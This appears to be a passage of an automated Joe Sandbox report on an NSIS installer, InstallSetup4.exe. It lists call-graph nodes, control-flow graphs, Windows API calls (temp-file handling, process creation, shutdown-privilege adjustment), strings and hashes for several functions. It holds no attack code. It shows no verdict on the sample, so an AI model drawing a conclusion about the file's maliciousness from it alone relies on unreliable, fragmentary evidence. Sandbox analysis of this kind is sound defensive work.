405cfc lstrlenW FindFirstFileW 3214->3219 3215->3214 3218 405de7 3216->3218 3217->3219 3220 405e26 3 API calls 3218->3220 3218->3237 3219->3209 3221 405d1e 3219->3221 3222 405df1 3220->3222 3223 405da5 FindNextFileW 3221->3223 3233 405c63 64 API calls 3221->3233 3235 4055dc 28 API calls 3221->3235 3238 4055dc 28 API calls 3221->3238 3239 406317 40 API calls 3221->3239 3359 406557 lstrcpynW 3221->3359 3360 405c1b 3221->3360 3224 405c1b 5 API calls 3222->3224 3223->3221 3227 405dbb FindClose 3223->3227 3226 405dfd 3224->3226 3228 405e17 3226->3228 3229 405e01 3226->3229 3227->3209 3231 4055dc 28 API calls 3228->3231 3232 4055dc 28 API calls 3229->3232 3229->3237 3231->3237 3234 405e0e 3232->3234 3233->3221 3236 406317 40 API calls 3234->3236 3235->3223 3236->3237 3237->3076 3238->3221 3239->3221 3241 403a2c CopyFileW 3240->3241 3242 40632b 3240->3242 3241->3070 3241->3076 3371 40619d 3242->3371 3245 405b79 3244->3245 3246 405b6d CloseHandle 3244->3246 3245->3076 3246->3245 3248 4068ca FindClose 3247->3248 3249 4068d5 3247->3249 3248->3249 3249->3076 3251 405bcc 3250->3251 3252 403a9d ExitProcess 3251->3252 3253 405be0 MessageBoxIndirectW 3251->3253 3253->3252 3255 401389 2 API calls 3254->3255 3256 401420 3255->3256 3256->3035 3258 405e42 lstrcatW 3257->3258 3259 40351f 3257->3259 3258->3259 3259->3087 3260->3093 3261->3095 3263 405e80 3262->3263 3264 4030ee 3263->3264 3265 405e86 CharPrevW 3263->3265 3266 406557 lstrcpynW 3264->3266 3265->3263 3265->3264 3266->3099 3268 403027 3267->3268 3269 40303f 3267->3269 3270 403030 DestroyWindow 3268->3270 3271 403037 3268->3271 3272 403047 3269->3272 3273 40304f GetTickCount 3269->3273 3270->3271 3271->3102 3303 406987 3272->3303 3274 403080 3273->3274 3275 40305d CreateDialogParamW ShowWindow 3273->3275 3274->3102 3275->3274 3278->3110 3281 4032d2 3279->3281 3280 403300 3283 4034d4 ReadFile 3280->3283 3281->3280 3309 4034ea SetFilePointer 3281->3309 3284 40330b 3283->3284 3285 40346d 3284->3285 3286 40331d GetTickCount 3284->3286 3288 403457 3284->3288 3287 4034af 3285->3287 3292 403471 3285->3292 3286->3288 3295 40336c 3286->3295 3290 4034d4 ReadFile 3287->3290 3288->3117 3289 4034d4 ReadFile 3289->3295 3290->3288 3291 4034d4 ReadFile 3291->3292 3292->3288 3292->3291 3293 4060f9 WriteFile 3292->3293 3293->3292 3294 4033c2 GetTickCount 3294->3295 3295->3288 3295->3289 3295->3294 3296 4033e7 MulDiv wsprintfW 3295->3296 3307 4060f9 WriteFile 3295->3307 3310 4055dc 3296->3310 3321 4060ca ReadFile 3299->3321 3302->3109 3304 4069a4 PeekMessageW 3303->3304 3305 40304d 3304->3305 3306 40699a DispatchMessageW 3304->3306 3305->3102 3306->3304 3308 406117 3307->3308 3308->3295 3309->3280 3311 4055f7 3310->3311 3312 405699 3310->3312 3313 405613 lstrlenW 3311->3313 3314 406594 21 API calls 3311->3314 3312->3295 3315 405621 lstrlenW 3313->3315 3316 40563c 3313->3316 3314->3313 3315->3312 3319 405633 lstrcatW 3315->3319 3317 405642 SetWindowTextW 3316->3317 3318 40564f 3316->3318 3317->3318 3318->3312 3320 405655 SendMessageW SendMessageW SendMessageW 3318->3320 3319->3316 3320->3312 3322 4034e7 3321->3322 3322->3113 3323->3127 3325 403f13 3324->3325 3340 40649e wsprintfW 3325->3340 3327 403f84 3341 403fb8 3327->3341 3329 403f89 3330 403cb4 3329->3330 3331 406594 21 API calls 3329->3331 3330->3132 3331->3329 3332->3134 3344 404522 3333->3344 3335 4056f9 3336 404522 SendMessageW 3335->3336 3338 40570b OleUninitialize 3336->3338 3337 4056d2 3337->3335 3347 401389 3337->3347 3338->3164 3340->3327 3342 406594 21 API calls 3341->3342 3343 403fc6 SetWindowTextW 3342->3343 3343->3329 3345 40453a 3344->3345 3346 40452b SendMessageW 3344->3346 3345->3337 3346->3345 3349 401390 3347->3349 3348 4013fe 3348->3337 3349->3348 3350 4013cb MulDiv SendMessageW 3349->3350 3350->3349 3351->3179 3353 405eee 3352->3353 3356 405f00 3352->3356 3355 405efb CharNextW 3353->3355 3353->3356 3354 405f24 3354->3182 3354->3183 3355->3354 3356->3354 3357 405e53 CharNextW 3356->3357 3357->3356 3358->3211 3359->3221 3368 406022 GetFileAttributesW 3360->3368 3363 405c48 3363->3221 3364 405c36 RemoveDirectoryW 3366 405c44 3364->3366 3365 405c3e DeleteFileW 3365->3366 3366->3363 3367 405c54 SetFileAttributesW 3366->3367 3367->3363 3369 405c27 3368->3369 3370 406034 SetFileAttributesW 3368->3370 3369->3363 3369->3364 3369->3365 3370->3369 3372 4061f3 GetShortPathNameW 3371->3372 3373 4061cd 3371->3373 3375 406312 3372->3375 3376 406208 3372->3376 3398 406047 GetFileAttributesW CreateFileW 3373->3398 3375->3241 3376->3375 3378 406210 wsprintfA 3376->3378 3377 4061d7 CloseHandle GetShortPathNameW 3377->3375 3379 4061eb 3377->3379 3380 406594 21 API calls 3378->3380 3379->3372 3379->3375 3381 406238 3380->3381 3399 406047 GetFileAttributesW CreateFileW 3381->3399 3383 406245 3383->3375 3384 406254 GetFileSize GlobalAlloc 3383->3384 3385 406276 3384->3385 3386 40630b CloseHandle 3384->3386 3387 4060ca ReadFile 3385->3387 3386->3375 3388 40627e 3387->3388 3388->3386 3400 405fac lstrlenA 3388->3400 3391 406295 lstrcpyA 3394 4062b7 3391->3394 3392 4062a9 3393 405fac 4 API calls 3392->3393 3393->3394 3395 4062ee SetFilePointer 3394->3395 3396 4060f9 WriteFile 3395->3396 3397 406304 GlobalFree 3396->3397 3397->3386 3398->3377 3399->3383 3401 405fed lstrlenA 3400->3401 3402 405ff5 3401->3402 3403 405fc6 lstrcmpiA 3401->3403 3402->3391 3402->3392 3403->3402 3404 405fe4 CharNextA 3403->3404 3404->3401 4385 401a35 4386 402dab 21 API calls 4385->4386 4387 401a3e ExpandEnvironmentStringsW 4386->4387 4388 401a52 4387->4388 4390 401a65 4387->4390 4389 401a57 lstrcmpW 4388->4389 4388->4390 4389->4390 4396 4023b7 4397 4023c5 4396->4397 4398 4023bf 4396->4398 4400 4023d3 4397->4400 4401 402dab 21 API calls 4397->4401 4399 402dab 21 API calls 4398->4399 4399->4397 4402 4023e1 4400->4402 4403 402dab 21 API calls 4400->4403 4401->4400 4404 402dab 21 API calls 4402->4404 4403->4402 4405 4023ea WritePrivateProfileStringW 4404->4405 4406 4014b8 4407 4014be 4406->4407 4408 401389 2 API calls 4407->4408 4409 4014c6 4408->4409 4410 402439 4411 402441 4410->4411 4412 40246c 4410->4412 4414 402deb 21 API calls 4411->4414 4413 402dab 21 API calls 4412->4413 4415 402473 4413->4415 4416 402448 4414->4416 4421 402e69 4415->4421 4418 402dab 21 API calls 4416->4418 4420 402480 4416->4420 4419 402459 RegDeleteValueW RegCloseKey 4418->4419 4419->4420 4422 402e76 4421->4422 4423 402e7d 4421->4423 4422->4420 4423->4422 4425 402eae 4423->4425 4426 4063c4 RegOpenKeyExW 4425->4426 4427 402edc 4426->4427 4428 402f86 4427->4428 4429 402eec RegEnumValueW 4427->4429 4433 402f0f 4427->4433 4428->4422 4430 402f76 RegCloseKey 4429->4430 4429->4433 4430->4428 4431 402f4b RegEnumKeyW 4432 402f54 RegCloseKey 4431->4432 4431->4433 4434 40694b 5 API calls 4432->4434 4433->4430 4433->4431 4433->4432 4435 402eae 6 API calls 4433->4435 4436 402f64 4434->4436 4435->4433 4436->4428 4437 402f68 RegDeleteKeyW 4436->4437 4437->4428 4438 40173a 4439 402dab 21 API calls 4438->4439 4440 401741 SearchPathW 4439->4440 4441 40175c 4440->4441 4442 401d3d 4443 402d89 21 API calls 4442->4443 4444 401d44 4443->4444 4445 402d89 21 API calls 4444->4445 4446 401d50 GetDlgItem 4445->4446 4447 40263d 4446->4447

                                                                                            Executed Functions

                                                                                            Function 00403532 Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 464stringfilecomCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 403532-403584 SetErrorMode GetVersionExW 1 403586-4035b6 GetVersionExW 0->1 2 4035be-4035c3 0->2 1->2 3 4035c5 2->3 4 4035cb-40360d 2->4 3->4 5 403620 4->5 6 40360f-403617 call 40694b 4->6 8 403625-403639 call 4068db lstrlenA 5->8 6->5 12 403619 6->12 13 40363b-403657 call 40694b * 3 8->13 12->5 20 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 13->20 21 403659-40365f 13->21 28 4036d5-4036e9 call 405e53 CharNextW 20->28 29 4036ce-4036d0 20->29 21->20 25 403661 21->25 25->20 32 4037e4-4037ea 28->32 29->28 33 4037f0 32->33 34 4036ee-4036f4 32->34 37 403804-40381e GetTempPathW call 403501 33->37 35 4036f6-4036fb 34->35 36 4036fd-403704 34->36 35->35 35->36 38 403706-40370b 36->38 39 40370c-403710 36->39 44 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 37->44 45 403876-403890 DeleteFileW call 403082 37->45 38->39 42 4037d1-4037e0 call 405e53 39->42 43 403716-40371c 39->43 42->32 61 4037e2-4037e3 42->61 47 403736-40376f 43->47 48 40371e-403725 43->48 44->45 64 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 44->64 66 403896-40389c 45->66 67 403a7d-403a8d ExitProcess OleUninitialize 45->67 54 403771-403776 47->54 55 40378c-4037c6 47->55 52 403727-40372a 48->52 53 40372c 48->53 52->47 52->53 53->47 54->55 56 403778-403780 54->56 58 4037c8-4037cc 55->58 59 4037ce-4037d0 55->59 62 403782-403785 56->62 63 403787 56->63 58->59 65 4037f2-4037ff call 406557 58->65 59->42 61->32 62->55 62->63 63->55 64->45 64->67 65->37 71 4038a2-4038ad call 405e53 66->71 72 403935-40393c call 403c29 66->72 69 403ab3-403ab9 67->69 70 403a8f-403a9f call 405bb7 ExitProcess 67->70 77 403b37-403b3f 69->77 78 403abb-403ad1 GetCurrentProcess OpenProcessToken 69->78 88 4038fb-403905 71->88 89 4038af-4038e4 71->89 86 403941-403945 72->86 80 403b41 77->80 81 403b45-403b49 ExitProcess 77->81 84 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 78->84 85 403b07-403b15 call 40694b 78->85 80->81 84->85 97 403b23-403b2e ExitWindowsEx 85->97 98 403b17-403b21 85->98 86->67 91 403907-403915 call 405f2e 88->91 92 40394a-403970 call 405b22 lstrlenW call 406557 88->92 93 4038e6-4038ea 89->93 91->67 107 40391b-403931 call 406557 * 2 91->107 110 403981-403999 92->110 111 403972-40397c call 406557 92->111 95 4038f3-4038f7 93->95 96 4038ec-4038f1 93->96 95->93 101 4038f9 95->101 96->95 96->101 97->77 102 403b30-403b32 call 40140b 97->102 98->97 98->102 101->88 102->77 107->72 114 40399e-4039a2 110->114 111->110 116 4039a7-4039d1 wsprintfW call 406594 114->116 120 4039d3-4039d8 call 405aab 116->120 121 4039da call 405b05 116->121 124 4039df-4039e1 120->124 121->124 126 4039e3-4039ed GetFileAttributesW 124->126 127 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 124->127 128 403a0e-403a19 126->128 129 4039ef-4039f8 DeleteFileW 126->129 135 403a7b 127->135 136 403a3e-403a5f call 406317 call 406594 call 405b3a 127->136 128->114 132 403a1b 128->132 129->128 131 4039fa-403a0c call 405c63 129->131 131->116 131->128 132->67 135->67 144 403a61-403a6b 136->144 145 403aa5-403ab1 CloseHandle 136->145 144->135 146 403a6d-403a75 call 4068b4 144->146 145->135 146->116 146->135
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32 ref: 00403555
                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                            • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                            • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                            • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                            • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                            • DeleteFileW.KERNEL32(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                              • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                            • wsprintfW.USER32 ref: 004039B1
                                                                                            • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                            • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                              • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                            • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                              • Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                              • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                              • Part of subcall function 004068B4: FindFirstFileW.KERNEL32(76F93420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                              • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                            • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7D
                                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                            • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                            • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                            • ExitProcess.KERNEL32 ref: 00403B49
                                                                                              • Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\InstallSetup4.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                            • API String ID: 2017177436-3803441485
                                                                                            • Opcode ID: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
                                                                                            • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                            • Opcode Fuzzy Hash: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
                                                                                            • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                                                                            Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 289 405c63-405c89 call 405f2e 292 405ca2-405ca9 289->292 293 405c8b-405c9d DeleteFileW 289->293 295 405cab-405cad 292->295 296 405cbc-405ccc call 406557 292->296 294 405e1f-405e23 293->294 297 405cb3-405cb6 295->297 298 405dcd-405dd2 295->298 302 405cdb-405cdc call 405e72 296->302 303 405cce-405cd9 lstrcatW 296->303 297->296 297->298 298->294 301 405dd4-405dd7 298->301 304 405de1-405de9 call 4068b4 301->304 305 405dd9-405ddf 301->305 306 405ce1-405ce5 302->306 303->306 304->294 312 405deb-405dff call 405e26 call 405c1b 304->312 305->294 309 405cf1-405cf7 lstrcatW 306->309 310 405ce7-405cef 306->310 313 405cfc-405d18 lstrlenW FindFirstFileW 309->313 310->309 310->313 329 405e01-405e04 312->329 330 405e17-405e1a call 4055dc 312->330 315 405dc2-405dc6 313->315 316 405d1e-405d26 313->316 315->298 320 405dc8 315->320 317 405d46-405d5a call 406557 316->317 318 405d28-405d30 316->318 331 405d71-405d7c call 405c1b 317->331 332 405d5c-405d64 317->332 321 405d32-405d3a 318->321 322 405da5-405db5 FindNextFileW 318->322 320->298 321->317 325 405d3c-405d44 321->325 322->316 328 405dbb-405dbc FindClose 322->328 325->317 325->322 328->315 329->305 333 405e06-405e15 call 4055dc call 406317 329->333 330->294 342 405d9d-405da0 call 4055dc 331->342 343 405d7e-405d81 331->343 332->322 334 405d66-405d6f call 405c63 332->334 333->294 334->322 342->322 346 405d83-405d93 call 4055dc call 406317 343->346 347 405d95-405d9b 343->347 346->322 347->322
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
                                                                                            • lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
                                                                                            • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                            • API String ID: 2035342205-3503601887
                                                                                            • Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                            • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                            • Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                            • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                                                                            Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 588 4068b4-4068c8 FindFirstFileW 589 4068d5 588->589 590 4068ca-4068d3 FindClose 588->590 591 4068d7-4068d8 589->591 590->591
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(76F93420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                            • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID: C:\
                                                                                            • API String ID: 2295610775-3404278061
                                                                                            • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                            • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                                                            • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                            • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                                                                            Function 00403C29 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215stringregistryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 149 403c29-403c41 call 40694b 152 403c43-403c4e GetUserDefaultUILanguage call 40649e 149->152 153 403c55-403c8c call 406425 149->153 157 403c53 152->157 158 403ca4-403caa lstrcatW 153->158 159 403c8e-403c9f call 406425 153->159 160 403caf-403cd8 call 403eff call 405f2e 157->160 158->160 159->158 166 403d6a-403d72 call 405f2e 160->166 167 403cde-403ce3 160->167 173 403d80-403da5 LoadImageW 166->173 174 403d74-403d7b call 406594 166->174 167->166 168 403ce9-403d11 call 406425 167->168 168->166 178 403d13-403d17 168->178 176 403e26-403e2e call 40140b 173->176 177 403da7-403dd7 RegisterClassW 173->177 174->173 191 403e30-403e33 176->191 192 403e38-403e43 call 403eff 176->192 179 403ef5 177->179 180 403ddd-403e21 SystemParametersInfoW CreateWindowExW 177->180 182 403d29-403d35 lstrlenW 178->182 183 403d19-403d26 call 405e53 178->183 185 403ef7-403efe 179->185 180->176 186 403d37-403d45 lstrcmpiW 182->186 187 403d5d-403d65 call 405e26 call 406557 182->187 183->182 186->187 190 403d47-403d51 GetFileAttributesW 186->190 187->166 194 403d53-403d55 190->194 195 403d57-403d58 call 405e72 190->195 191->185 201 403e49-403e63 ShowWindow call 4068db 192->201 202 403ecc-403ed4 call 4056af 192->202 194->187 194->195 195->187 209 403e65-403e6a call 4068db 201->209 210 403e6f-403e81 GetClassInfoW 201->210 207 403ed6-403edc 202->207 208 403eee-403ef0 call 40140b 202->208 207->191 213 403ee2-403ee9 call 40140b 207->213 208->179 209->210 211 403e83-403e93 GetClassInfoW RegisterClassW 210->211 212 403e99-403eca DialogBoxParamW call 40140b call 403b79 210->212 211->212 212->185 213->191
                                                                                            APIs
                                                                                              • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                              • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                            • GetUserDefaultUILanguage.KERNEL32(00000002,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43
                                                                                              • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                            • lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
                                                                                            • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76F93420), ref: 00403D2A
                                                                                            • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                            • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                                                                            • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
